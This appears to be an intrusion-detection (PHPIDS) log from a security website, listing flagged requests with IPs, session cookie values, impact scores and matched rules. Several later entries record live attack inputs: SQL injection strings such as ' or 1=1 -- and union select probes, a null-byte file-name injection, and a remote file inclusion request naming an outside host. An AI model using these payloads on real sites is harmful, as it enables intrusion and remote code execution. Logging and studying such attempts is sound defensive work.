Page:/i.php?page=videos/advanced-data-recovery-forensic-scott-moulton
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122865
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/advanced-data-recovery-forensic-scott-moulton
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122866
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/advanced-data-recovery-forensic-scott-moulton
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122867
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/advanced-data-recovery-forensic-scott-moulton
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122868
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/advanced-data-recovery-forensic-scott-moulton
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122857
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122858
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122859
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122860
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122861
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122862
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122851
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:01
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122852
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:01
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122853
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:01
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122854
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:01
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122855
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:01
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122856
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:01
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122845
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122846
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122847
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122848
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122849
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122850
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:57
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122839
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122840
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122841
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122842
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122843
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122844
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122833
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122834
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122835
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122836
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122837
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122838
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122827
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:45
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122828
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:45
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122829
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:45
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122830
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:45
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122831
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:45
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122832
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:51:45
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122825
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-29 03:40:25
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122826
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-04-29 03:40:25
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122823
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:58.187.67.100
Impact:20
Created:2010-04-29 02:38:50
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122824
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:58.187.67.100
Impact:20
Created:2010-04-29 02:38:50
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122821
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:58.187.67.100
Impact:20
Created:2010-04-29 02:38:47
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122822
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:58.187.67.100
Impact:20
Created:2010-04-29 02:38:47
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122819
Name:REQUEST.page
Value:' or 1=1 --
Page:/i.php?page=%27%20or%201=1%20--
IP:67.195.111.36
Impact:44
Created:2010-04-29 01:38:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122820
Name:GET.page
Value:' or 1=1 --
Page:/i.php?page=%27%20or%201=1%20--
IP:67.195.111.36
Impact:44
Created:2010-04-29 01:38:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122817
Name:REQUEST.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-04-29 01:35:29
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122818
Name:GET.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-04-29 01:35:29
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122815
Name:REQUEST.page
Value:suckmydick.phpbacktrack-3-man/runscript
Page:/i.php?page=suckmydick.php%00backtrack-3-man/runscript
IP:202.152.243.170
Impact:10
Created:2010-04-28 19:46:46
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122816
Name:GET.page
Value:suckmydick.phpbacktrack-3-man/runscript
Page:/i.php?page=suckmydick.php%00backtrack-3-man/runscript
IP:202.152.243.170
Impact:10
Created:2010-04-28 19:46:46
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122813
Name:REQUEST.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1?????
